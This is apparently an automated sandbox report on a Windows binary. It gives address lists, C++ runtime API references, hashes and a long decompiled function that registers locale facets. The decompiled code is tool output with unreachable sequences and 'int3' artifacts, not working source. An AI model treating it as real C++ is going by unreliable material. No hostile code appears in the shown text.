0x0048c787
0x0048c789
0x00000000
0x0048c789
0x0048c750
0x0048c750
0x00000000
0x0048c750
0x0048c74e
0x0048c6d2
0x0048c6d2
0x0048c6d5
0x0048c6d9
0x0048c6dd
0x0048c6ea
0x0048c6f2
0x0048c6f4
0x00000000
0x0048c6f4
0x0048c6bb
0x0048c6bb
0x00000000
0x0048c6bb
0x0048c6b9
0x0048c63d
0x0048c63d
0x0048c640
0x0048c644
0x0048c648
0x0048c655
0x0048c65d
0x0048c65f
0x00000000
0x0048c65f
0x0048c626
0x0048c626
0x00000000
0x0048c626
0x0048c624
0x0048c5a8
0x0048c5a8
0x0048c5ab
0x0048c5af
0x0048c5b3
0x0048c5c0
0x0048c5c8
0x0048c5ca
0x00000000
0x0048c5ca
0x0048c591
0x0048c591
0x00000000
0x0048c591
0x0048c58f
0x0048c513
0x0048c513
0x0048c516
0x0048c51a
0x0048c51e
0x0048c52b
0x0048c533
0x0048c535
0x00000000
0x0048c535
0x0048c4fc
0x0048c4fc
0x00000000
0x0048c4fc
0x0048c4fa

APIs

__EH_prolog3.LIBCMT ref: 0048C4C3
std::_Lockit::_Lockit.LIBCPMT ref: 0048C4CD

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

messages.LIBCPMT ref: 0048C507
std::_Facet_Register.LIBCPMT ref: 0048C51E
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C53E
Concurrency::cancel_current_task.LIBCPMT ref: 0048C54B

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registermessages
String ID:
API String ID: 37379925-0
Opcode ID: d59de9419ad3b190d17df556c0da70892262e61fff844c3cd2203e01b7d089c9
Instruction ID: 4bbd490ad041bba1fb52bbd727a2092eb91c672df0caa7d0fd5ec78508527980
Opcode Fuzzy Hash: d59de9419ad3b190d17df556c0da70892262e61fff844c3cd2203e01b7d089c9
Instruction Fuzzy Hash: 94010471E001259BCF01FB65D8556BE77B1AF84314F54080FE411AB382CF7C9E018798

Uniqueness

Uniqueness Score: -1.00%

Function 0048C551, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0048C551(intOrPtr _a8) {
				signed int _v4;
				signed int _v16;
				char _v20;
				void* _v224;
				signed int _t237;
				void* _t440;
				short* _t634;
				void* _t692;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t701;
				signed int _t702;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				signed int _t710;
				signed int _t711;
				void* _t712;
				signed int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t717;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				short* _t732;
				void* _t756;
				void* _t757;

				_push(8);
				L0049D90B(0x4d6966, _t692, _t712);
				L00488DEA( &_v20, 0);
				_t713 =  *0x4edde0; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t713;
				_t237 = E0042B315(_a8, E0042B22E(0x4edd8c, _t692, _t713, _t757));
				_t693 = _t237;
				if(_t237 != 0) {
					L5:
					L00488E42( &_v20);
					return L0049D8D4(_t693);
				} else {
					if(_t713 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E0048E04D(_t693, _t713, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							_push(8);
							L0049D90B(0x4d6966, _t693, _t713);
							L00488DEA( &_v20, 0);
							_t714 =  *0x4ede14; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t714;
							_t694 = E0042B315(_a8, E0042B22E(0x4eddb8, _t693, _t714, __eflags));
							__eflags = _t694;
							if(_t694 != 0) {
								L12:
								L00488E42( &_v20);
								return L0049D8D4(_t694);
							} else {
								__eflags = _t714;
								if(__eflags == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E0048E0B5(_t694, _t714, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E0042B042(__eflags);
										asm("int3");
										_push(8);
										L0049D90B(0x4d6966, _t694, _t714);
										L00488DEA( &_v20, 0);
										_t715 =  *0x4edde4; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t715;
										_t695 = E0042B315(_a8, E0042B22E(0x4edd90, _t694, _t715, __eflags));
										__eflags = _t695;
										if(_t695 != 0) {
											L19:
											L00488E42( &_v20);
											return L0049D8D4(_t695);
										} else {
											__eflags = _t715;
											if(__eflags == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E0048E11D(_t695, _t715, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E0042B042(__eflags);
													asm("int3");
													_push(8);
													L0049D90B(0x4d6966, _t695, _t715);
													L00488DEA( &_v20, 0);
													_t716 =  *0x4ede18; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t716;
													_t696 = E0042B315(_a8, E0042B22E(0x4eddbc, _t695, _t716, __eflags));
													__eflags = _t696;
													if(_t696 != 0) {
														L26:
														L00488E42( &_v20);
														return L0049D8D4(_t696);
													} else {
														__eflags = _t716;
														if(__eflags == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E0048E185(_t696, _t716, __eflags) - 0xffffffff;
															if(__eflags == 0) {
																E0042B042(__eflags);
																asm("int3");
																_push(8);
																L0049D90B(0x4d6966, _t696, _t716);
																L00488DEA( &_v20, 0);
																_t717 =  *0x4edde8; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t717;
																_t697 = E0042B315(_a8, E0042B22E(0x4edd94, _t696, _t717, __eflags));
																__eflags = _t697;
																if(_t697 != 0) {
																	L33:
																	L00488E42( &_v20);
																	return L0049D8D4(_t697);
																} else {
																	__eflags = _t717;
																	if(__eflags == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E0048E1ED(_t697, _t717, __eflags) - 0xffffffff;
																		if(__eflags == 0) {
																			E0042B042(__eflags);
																			asm("int3");
																			_push(8);
																			L0049D90B(0x4d6966, _t697, _t717);
																			L00488DEA( &_v20, 0);
																			_t718 =  *0x4ede20;
																			_v4 = _v4 & 0x00000000;
																			_v16 = _t718;
																			_t698 = E0042B315(_a8, E0042B22E(0x4eddc4, _t697, _t718, __eflags));
																			__eflags = _t698;
																			if(_t698 != 0) {
																				L40:
																				L00488E42( &_v20);
																				return L0049D8D4(_t698);
																			} else {
																				__eflags = _t718;
																				if(__eflags == 0) {
																					_push(_a8);
																					_push( &_v16);
																					__eflags = E0048E255(_t698, _t718, __eflags) - 0xffffffff;
																					if(__eflags == 0) {
																						E0042B042(__eflags);
																						asm("int3");
																						_push(8);
																						L0049D90B(0x4d6966, _t698, _t718);
																						L00488DEA( &_v20, 0);
																						_t719 =  *0x4ede1c;
																						_v4 = _v4 & 0x00000000;
																						_v16 = _t719;
																						_t699 = E0042B315(_a8, E0042B22E(0x4eddc0, _t698, _t719, __eflags));
																						__eflags = _t699;
																						if(_t699 != 0) {
																							L47:
																							L00488E42( &_v20);
																							return L0049D8D4(_t699);
																						} else {
																							__eflags = _t719;
																							if(__eflags == 0) {
																								_push(_a8);
																								_push( &_v16);
																								__eflags = E0048E2D9(_t699, _t719, __eflags) - 0xffffffff;
																								if(__eflags == 0) {
																									E0042B042(__eflags);
																									asm("int3");
																									_push(8);
																									L0049D90B(0x4d6966, _t699, _t719);
																									L00488DEA( &_v20, 0);
																									_t720 =  *0x4eddf0;
																									_v4 = _v4 & 0x00000000;
																									_v16 = _t720;
																									_t700 = E0042B315(_a8, E0042B22E(0x4edd9c, _t699, _t720, __eflags));
																									__eflags = _t700;
																									if(_t700 != 0) {
																										L54:
																										L00488E42( &_v20);
																										return L0049D8D4(_t700);
																									} else {
																										__eflags = _t720;
																										if(__eflags == 0) {
																											_push(_a8);
																											_push( &_v16);
																											__eflags = E0048E35E(_t700, _t720, __eflags) - 0xffffffff;
																											if(__eflags == 0) {
																												E0042B042(__eflags);
																												asm("int3");
																												_push(8);
																												L0049D90B(0x4d6966, _t700, _t720);
																												L00488DEA( &_v20, 0);
																												_t721 =  *0x4eddec;
																												_v4 = _v4 & 0x00000000;
																												_v16 = _t721;
																												_t701 = E0042B315(_a8, E0042B22E(0x4edd98, _t700, _t721, __eflags));
																												__eflags = _t701;
																												if(_t701 != 0) {
																													L61:
																													L00488E42( &_v20);
																													return L0049D8D4(_t701);
																												} else {
																													__eflags = _t721;
																													if(__eflags == 0) {
																														_push(_a8);
																														_push( &_v16);
																														__eflags = E0048E3E2(_t701, _t721, __eflags) - 0xffffffff;
																														if(__eflags == 0) {
																															E0042B042(__eflags);
																															asm("int3");
																															_push(8);
																															L0049D90B(0x4d6966, _t701, _t721);
																															L00488DEA( &_v20, 0);
																															_t722 =  *0x4ede00;
																															_v4 = _v4 & 0x00000000;
																															_v16 = _t722;
																															_t702 = E0042B315(_a8, E0042B22E(0x4edda4, _t701, _t722, __eflags));
																															__eflags = _t702;
																															if(_t702 != 0) {
																																L68:
																																L00488E42( &_v20);
																																return L0049D8D4(_t702);
																															} else {
																																__eflags = _t722;
																																if(__eflags == 0) {
																																	_push(_a8);
																																	_push( &_v16);
																																	__eflags = E0048E467(_t702, _t722, __eflags) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E0042B042(__eflags);
																																		asm("int3");
																																		_push(8);
																																		L0049D90B(0x4d6966, _t702, _t722);
																																		L00488DEA( &_v20, 0);
																																		_t723 =  *0x4eddd0;
																																		_v4 = _v4 & 0x00000000;
																																		_v16 = _t723;
																																		_t703 = E0042B315(_a8, E0042B22E(0x4edd7c, _t702, _t723, __eflags));
																																		__eflags = _t703;
																																		if(_t703 != 0) {
																																			L75:
																																			L00488E42( &_v20);
																																			return L0049D8D4(_t703);
																																		} else {
																																			__eflags = _t723;
																																			if(__eflags == 0) {
																																				_push(_a8);
																																				_push( &_v16);
																																				__eflags = E0048E4CF(_t703, _t723, __eflags) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E0042B042(__eflags);
																																					asm("int3");
																																					_push(8);
																																					L0049D90B(0x4d6966, _t703, _t723);
																																					L00488DEA( &_v20, 0);
																																					_t724 =  *0x4ede04;
																																					_v4 = _v4 & 0x00000000;
																																					_v16 = _t724;
																																					_t704 = E0042B315(_a8, E0042B22E(0x4edda8, _t703, _t724, __eflags));
																																					__eflags = _t704;
																																					if(_t704 != 0) {
																																						L82:
																																						L00488E42( &_v20);
																																						return L0049D8D4(_t704);
																																					} else {
																																						__eflags = _t724;
																																						if(__eflags == 0) {
																																							_push(_a8);
																																							_push( &_v16);
																																							__eflags = E0048E537(_t704, _t724, __eflags) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E0042B042(__eflags);
																																								asm("int3");
																																								_push(8);
																																								L0049D90B(0x4d6966, _t704, _t724);
																																								L00488DEA( &_v20, 0);
																																								_t725 =  *0x4eddd4;
																																								_v4 = _v4 & 0x00000000;
																																								_v16 = _t725;
																																								_t705 = E0042B315(_a8, E0042B22E(0x4edd80, _t704, _t725, __eflags));
																																								__eflags = _t705;
																																								if(_t705 != 0) {
																																									L89:
																																									L00488E42( &_v20);
																																									return L0049D8D4(_t705);
																																								} else {
																																									__eflags = _t725;
																																									if(__eflags == 0) {
																																										_push(_a8);
																																										_push( &_v16);
																																										__eflags = E0048E59F(_t705, _t725, __eflags) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E0042B042(__eflags);
																																											asm("int3");
																																											_push(8);
																																											L0049D90B(0x4d6966, _t705, _t725);
																																											L00488DEA( &_v20, 0);
																																											_t726 =  *0x4ede08;
																																											_v4 = _v4 & 0x00000000;
																																											_v16 = _t726;
																																											_t706 = E0042B315(_a8, E0042B22E(0x4eddac, _t705, _t726, __eflags));
																																											__eflags = _t706;
																																											if(_t706 != 0) {
																																												L96:
																																												L00488E42( &_v20);
																																												return L0049D8D4(_t706);
																																											} else {
																																												__eflags = _t726;
																																												if(__eflags == 0) {
																																													_push(_a8);
																																													_push( &_v16);
																																													__eflags = E0048E607(_t706, _t726, __eflags) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E0042B042(__eflags);
																																														asm("int3");
																																														_push(8);
																																														L0049D90B(0x4d6966, _t706, _t726);
																																														L00488DEA( &_v20, 0);
																																														_t727 =  *0x4eddd8;
																																														_v4 = _v4 & 0x00000000;
																																														_v16 = _t727;
																																														_t707 = E0042B315(_a8, E0042B22E(0x4edd84, _t706, _t727, __eflags));
																																														__eflags = _t707;
																																														if(_t707 != 0) {
																																															L103:
																																															L00488E42( &_v20);
																																															return L0049D8D4(_t707);
																																														} else {
																																															__eflags = _t727;
																																															if(__eflags == 0) {
																																																_push(_a8);
																																																_push( &_v16);
																																																__eflags = E0048E682(_t707, _t727, __eflags) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E0042B042(__eflags);
																																																	asm("int3");
																																																	_push(8);
																																																	L0049D90B(0x4d6966, _t707, _t727);
																																																	L00488DEA( &_v20, 0);
																																																	_t728 =  *0x4ede24;
																																																	_v4 = _v4 & 0x00000000;
																																																	_v16 = _t728;
																																																	_t708 = E0042B315(_a8, E0042B22E(0x4eddc8, _t707, _t728, __eflags));
																																																	__eflags = _t708;
																																																	if(_t708 != 0) {
																																																		L110:
																																																		L00488E42( &_v20);
																																																		return L0049D8D4(_t708);
																																																	} else {
																																																		__eflags = _t728;
																																																		if(__eflags == 0) {
																																																			_push(_a8);
																																																			_push( &_v16);
																																																			__eflags = E0048E6FD(_t708, _t728, __eflags) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E0042B042(__eflags);
																																																				asm("int3");
																																																				_push(8);
																																																				L0049D90B(0x4d6966, _t708, _t728);
																																																				L00488DEA( &_v20, 0);
																																																				_t729 =  *0x4eddf4;
																																																				_v4 = _v4 & 0x00000000;
																																																				_v16 = _t729;
																																																				_t709 = E0042B315(_a8, E0042B22E(0x4edda0, _t708, _t729, __eflags));
																																																				__eflags = _t709;
																																																				if(_t709 != 0) {
																																																					L117:
																																																					L00488E42( &_v20);
																																																					return L0049D8D4(_t709);
																																																				} else {
																																																					__eflags = _t729;
																																																					if(__eflags == 0) {
																																																						_push(_a8);
																																																						_push( &_v16);
																																																						__eflags = E0048E769(_t709, _t729, __eflags) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E0042B042(__eflags);
																																																							asm("int3");
																																																							_push(8);
																																																							L0049D90B(0x4d6966, _t709, _t729);
																																																							L00488DEA( &_v20, 0);
																																																							_t730 =  *0x4ede28;
																																																							_v4 = _v4 & 0x00000000;
																																																							_v16 = _t730;
																																																							_t710 = E0042B315(_a8, E0042B22E(0x4eddcc, _t709, _t730, __eflags));
																																																							__eflags = _t710;
																																																							if(_t710 != 0) {
																																																								L124:
																																																								L00488E42( &_v20);
																																																								return L0049D8D4(_t710);
																																																							} else {
																																																								__eflags = _t730;
																																																								if(__eflags == 0) {
																																																									_push(_a8);
																																																									_push( &_v16);
																																																									__eflags = E0048E7D5(_t710, _t730, __eflags) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E0042B042(__eflags);
																																																										asm("int3");
																																																										_push(8);
																																																										L0049D90B(0x4d6966, _t710, _t730);
																																																										L00488DEA( &_v20, 0);
																																																										_t731 =  *0x4eddf8;
																																																										_v4 = _v4 & 0x00000000;
																																																										_v16 = _t731;
																																																										_t711 = E0042B315(_a8, E0042B22E(0x4edd78, _t710, _t731, __eflags));
																																																										__eflags = _t711;
																																																										if(_t711 != 0) {
																																																											L131:
																																																											L00488E42( &_v20);
																																																											return L0049D8D4(_t711);
																																																										} else {
																																																											__eflags = _t731;
																																																											if(__eflags == 0) {
																																																												_push(_a8);
																																																												_push( &_v16);
																																																												_t440 = E0048E849(_t711, _t731, __eflags);
																																																												_pop(_t634);
																																																												__eflags = _t440 - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E0042B042(__eflags);
																																																													asm("int3");
																																																													_push(_t731);
																																																													_t732 = _t634;
																																																													_t230 = _t732 + 0x10;
																																																													 *_t230 =  *(_t732 + 0x10) & 0x00000000;
																																																													__eflags =  *_t230;
																																																													 *((intOrPtr*)(_t732 + 0x14)) = 7;
																																																													 *_t732 = 0;
																																																													L00494BE0( *((intOrPtr*)(_t756 + 8)));
																																																													return _t732;
																																																												} else {
																																																													_t711 = _v16;
																																																													_v16 = _t711;
																																																													_v4 = 1;
																																																													E0048919D(_t711);
																																																													 *0x4f02b4();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t711 + 4))))();
																																																													 *0x4eddf8 = _t711;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t711 = _t731;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t710 = _v16;
																																																										_v16 = _t710;
																																																										_v4 = 1;
																																																										E0048919D(_t710);
																																																										 *0x4f02b4();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t710 + 4))))();
																																																										 *0x4ede28 = _t710;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t710 = _t730;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t709 = _v16;
																																																							_v16 = _t709;
																																																							_v4 = 1;
																																																							E0048919D(_t709);
																																																							 *0x4f02b4();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t709 + 4))))();
																																																							 *0x4eddf4 = _t709;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t709 = _t729;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t708 = _v16;
																																																				_v16 = _t708;
																																																				_v4 = 1;
																																																				E0048919D(_t708);
																																																				 *0x4f02b4();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t708 + 4))))();
																																																				 *0x4ede24 = _t708;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t708 = _t728;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t707 = _v16;
																																																	_v16 = _t707;
																																																	_v4 = 1;
																																																	E0048919D(_t707);
																																																	 *0x4f02b4();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t707 + 4))))();
																																																	 *0x4eddd8 = _t707;
																																																	goto L103;
																																																}
																																															} else {
																																																_t707 = _t727;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t706 = _v16;
																																														_v16 = _t706;
																																														_v4 = 1;
																																														E0048919D(_t706);
																																														 *0x4f02b4();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t706 + 4))))();
																																														 *0x4ede08 = _t706;
																																														goto L96;
																																													}
																																												} else {
																																													_t706 = _t726;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t705 = _v16;
																																											_v16 = _t705;
																																											_v4 = 1;
																																											E0048919D(_t705);
																																											 *0x4f02b4();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t705 + 4))))();
																																											 *0x4eddd4 = _t705;
																																											goto L89;
																																										}
																																									} else {
																																										_t705 = _t725;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t704 = _v16;
																																								_v16 = _t704;
																																								_v4 = 1;
																																								E0048919D(_t704);
																																								 *0x4f02b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t704 + 4))))();
																																								 *0x4ede04 = _t704;
																																								goto L82;
																																							}
																																						} else {
																																							_t704 = _t724;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t703 = _v16;
																																					_v16 = _t703;
																																					_v4 = 1;
																																					E0048919D(_t703);
																																					 *0x4f02b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t703 + 4))))();
																																					 *0x4eddd0 = _t703;
																																					goto L75;
																																				}
																																			} else {
																																				_t703 = _t723;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t702 = _v16;
																																		_v16 = _t702;
																																		_v4 = 1;
																																		E0048919D(_t702);
																																		 *0x4f02b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t702 + 4))))();
																																		 *0x4ede00 = _t702;
																																		goto L68;
																																	}
																																} else {
																																	_t702 = _t722;
																																	goto L68;
																																}
																															}
																														} else {
																															_t701 = _v16;
																															_v16 = _t701;
																															_v4 = 1;
																															E0048919D(_t701);
																															 *0x4f02b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t701 + 4))))();
																															 *0x4eddec = _t701;
																															goto L61;
																														}
																													} else {
																														_t701 = _t721;
																														goto L61;
																													}
																												}
																											} else {
																												_t700 = _v16;
																												_v16 = _t700;
																												_v4 = 1;
																												E0048919D(_t700);
																												 *0x4f02b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t700 + 4))))();
																												 *0x4eddf0 = _t700;
																												goto L54;
																											}
																										} else {
																											_t700 = _t720;
																											goto L54;
																										}
																									}
																								} else {
																									_t699 = _v16;
																									_v16 = _t699;
																									_v4 = 1;
																									E0048919D(_t699);
																									 *0x4f02b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t699 + 4))))();
																									 *0x4ede1c = _t699;
																									goto L47;
																								}
																							} else {
																								_t699 = _t719;
																								goto L47;
																							}
																						}
																					} else {
																						_t698 = _v16;
																						_v16 = _t698;
																						_v4 = 1;
																						E0048919D(_t698);
																						 *0x4f02b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t698 + 4))))();
																						 *0x4ede20 = _t698;
																						goto L40;
																					}
																				} else {
																					_t698 = _t718;
																					goto L40;
																				}
																			}
																		} else {
																			_t697 = _v16;
																			_v16 = _t697;
																			_v4 = 1;
																			E0048919D(_t697);
																			 *0x4f02b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t697 + 4))))();
																			 *0x4edde8 = _t697;
																			goto L33;
																		}
																	} else {
																		_t697 = _t717;
																		goto L33;
																	}
																}
															} else {
																_t696 = _v16;
																_v16 = _t696;
																_v4 = 1;
																E0048919D(_t696);
																 *0x4f02b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t696 + 4))))();
																 *0x4ede18 = _t696;
																goto L26;
															}
														} else {
															_t696 = _t716;
															goto L26;
														}
													}
												} else {
													_t695 = _v16;
													_v16 = _t695;
													_v4 = 1;
													E0048919D(_t695);
													 *0x4f02b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t695 + 4))))();
													 *0x4edde4 = _t695;
													goto L19;
												}
											} else {
												_t695 = _t715;
												goto L19;
											}
										}
									} else {
										_t694 = _v16;
										_v16 = _t694;
										_v4 = 1;
										E0048919D(_t694);
										 *0x4f02b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t694 + 4))))();
										 *0x4ede14 = _t694;
										goto L12;
									}
								} else {
									_t694 = _t714;
									goto L12;
								}
							}
						} else {
							_t693 = _v16;
							_v16 = _t693;
							_v4 = 1;
							E0048919D(_t693);
							 *0x4f02b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t693 + 4))))();
							 *0x4edde0 = _t693;
							goto L5;
						}
					} else {
						_t693 = _t713;
						goto L5;
					}
				}
			}

0x0048c551
0x0048c558
0x0048c562
0x0048c567
0x0048c572
0x0048c576
0x0048c582
0x0048c587
0x0048c58b
0x0048c5d0
0x0048c5d3
0x0048c5df
0x0048c58d
0x0048c58f
0x0048c595
0x0048c59b
0x0048c5a3
0x0048c5a6
0x0048c5e0
0x0048c5e5
0x0048c5e6
0x0048c5ed
0x0048c5f7
0x0048c5fc
0x0048c607
0x0048c60b
0x0048c61c
0x0048c61e
0x0048c620
0x0048c665
0x0048c668
0x0048c674
0x0048c622
0x0048c622
0x0048c624
0x0048c62a
0x0048c630
0x0048c638
0x0048c63b
0x0048c675
0x0048c67a
0x0048c67b
0x0048c682
0x0048c68c
0x0048c691
0x0048c69c
0x0048c6a0
0x0048c6b1
0x0048c6b3
0x0048c6b5
0x0048c6fa
0x0048c6fd
0x0048c709
0x0048c6b7
0x0048c6b7
0x0048c6b9
0x0048c6bf
0x0048c6c5
0x0048c6cd
0x0048c6d0
0x0048c70a
0x0048c70f
0x0048c710
0x0048c717
0x0048c721
0x0048c726
0x0048c731
0x0048c735
0x0048c746
0x0048c748
0x0048c74a
0x0048c78f
0x0048c792
0x0048c79e
0x0048c74c
0x0048c74c
0x0048c74e
0x0048c754
0x0048c75a
0x0048c762
0x0048c765
0x0048c79f
0x0048c7a4
0x0048c7a5
0x0048c7ac
0x0048c7b6
0x0048c7bb
0x0048c7c6
0x0048c7ca
0x0048c7db
0x0048c7dd
0x0048c7df
0x0048c824
0x0048c827
0x0048c833
0x0048c7e1
0x0048c7e1
0x0048c7e3
0x0048c7e9
0x0048c7ef
0x0048c7f7
0x0048c7fa
0x0048c834
0x0048c839
0x0048c83a
0x0048c841
0x0048c84b
0x0048c850
0x0048c85b
0x0048c85f
0x0048c870
0x0048c872
0x0048c874
0x0048c8b9
0x0048c8bc
0x0048c8c8
0x0048c876
0x0048c876
0x0048c878
0x0048c87e
0x0048c884
0x0048c88c
0x0048c88f
0x0048c8c9
0x0048c8ce
0x0048c8cf
0x0048c8d6
0x0048c8e0
0x0048c8e5
0x0048c8f0
0x0048c8f4
0x0048c905
0x0048c907
0x0048c909
0x0048c94e
0x0048c951
0x0048c95d
0x0048c90b
0x0048c90b
0x0048c90d
0x0048c913
0x0048c919
0x0048c921
0x0048c924
0x0048c95e
0x0048c963
0x0048c964
0x0048c96b
0x0048c975
0x0048c97a
0x0048c985
0x0048c989
0x0048c99a
0x0048c99c
0x0048c99e
0x0048c9e3
0x0048c9e6
0x0048c9f2
0x0048c9a0
0x0048c9a0
0x0048c9a2
0x0048c9a8
0x0048c9ae
0x0048c9b6
0x0048c9b9
0x0048c9f3
0x0048c9f8
0x0048c9f9
0x0048ca00
0x0048ca0a
0x0048ca0f
0x0048ca1a
0x0048ca1e
0x0048ca2f
0x0048ca31
0x0048ca33
0x0048ca78
0x0048ca7b
0x0048ca87
0x0048ca35
0x0048ca35
0x0048ca37
0x0048ca3d
0x0048ca43
0x0048ca4b
0x0048ca4e
0x0048ca88
0x0048ca8d
0x0048ca8e
0x0048ca95
0x0048ca9f
0x0048caa4
0x0048caaf
0x0048cab3
0x0048cac4
0x0048cac6
0x0048cac8
0x0048cb0d
0x0048cb10
0x0048cb1c
0x0048caca
0x0048caca
0x0048cacc
0x0048cad2
0x0048cad8
0x0048cae0
0x0048cae3
0x0048cb1d
0x0048cb22
0x0048cb23
0x0048cb2a
0x0048cb34
0x0048cb39
0x0048cb44
0x0048cb48
0x0048cb59
0x0048cb5b
0x0048cb5d
0x0048cba2
0x0048cba5
0x0048cbb1
0x0048cb5f
0x0048cb5f
0x0048cb61
0x0048cb67
0x0048cb6d
0x0048cb75
0x0048cb78
0x0048cbb2
0x0048cbb7
0x0048cbb8
0x0048cbbf
0x0048cbc9
0x0048cbce
0x0048cbd9
0x0048cbdd
0x0048cbee
0x0048cbf0
0x0048cbf2
0x0048cc37
0x0048cc3a
0x0048cc46
0x0048cbf4
0x0048cbf4
0x0048cbf6
0x0048cbfc
0x0048cc02
0x0048cc0a
0x0048cc0d
0x0048cc47
0x0048cc4c
0x0048cc4d
0x0048cc54
0x0048cc5e
0x0048cc63
0x0048cc6e
0x0048cc72
0x0048cc83
0x0048cc85
0x0048cc87
0x0048cccc
0x0048cccf
0x0048ccdb
0x0048cc89
0x0048cc89
0x0048cc8b
0x0048cc91
0x0048cc97
0x0048cc9f
0x0048cca2
0x0048ccdc
0x0048cce1
0x0048cce2
0x0048cce9
0x0048ccf3
0x0048ccf8
0x0048cd03
0x0048cd07
0x0048cd18
0x0048cd1a
0x0048cd1c
0x0048cd61
0x0048cd64
0x0048cd70
0x0048cd1e
0x0048cd1e
0x0048cd20
0x0048cd26
0x0048cd2c
0x0048cd34
0x0048cd37
0x0048cd71
0x0048cd76
0x0048cd77
0x0048cd7e
0x0048cd88
0x0048cd8d
0x0048cd98
0x0048cd9c
0x0048cdad
0x0048cdaf
0x0048cdb1
0x0048cdf6
0x0048cdf9
0x0048ce05
0x0048cdb3
0x0048cdb3
0x0048cdb5
0x0048cdbb
0x0048cdc1
0x0048cdc9
0x0048cdcc
0x0048ce06
0x0048ce0b
0x0048ce0c
0x0048ce13
0x0048ce1d
0x0048ce22
0x0048ce2d
0x0048ce31
0x0048ce42
0x0048ce44
0x0048ce46
0x0048ce8b
0x0048ce8e
0x0048ce9a
0x0048ce48
0x0048ce48
0x0048ce4a
0x0048ce50
0x0048ce56
0x0048ce5e
0x0048ce61
0x0048ce9b
0x0048cea0
0x0048cea1
0x0048cea8
0x0048ceb2
0x0048ceb7
0x0048cec2
0x0048cec6
0x0048ced7
0x0048ced9
0x0048cedb
0x0048cf20
0x0048cf23
0x0048cf2f
0x0048cedd
0x0048cedd
0x0048cedf
0x0048cee5
0x0048ceeb
0x0048cef3
0x0048cef6
0x0048cf30
0x0048cf35
0x0048cf36
0x0048cf3d
0x0048cf47
0x0048cf4c
0x0048cf57
0x0048cf5b
0x0048cf6c
0x0048cf6e
0x0048cf70
0x0048cfb5
0x0048cfb8
0x0048cfc4
0x0048cf72
0x0048cf72
0x0048cf74
0x0048cf7a
0x0048cf80
0x0048cf88
0x0048cf8b
0x0048cfc5
0x0048cfca
0x0048cfcb
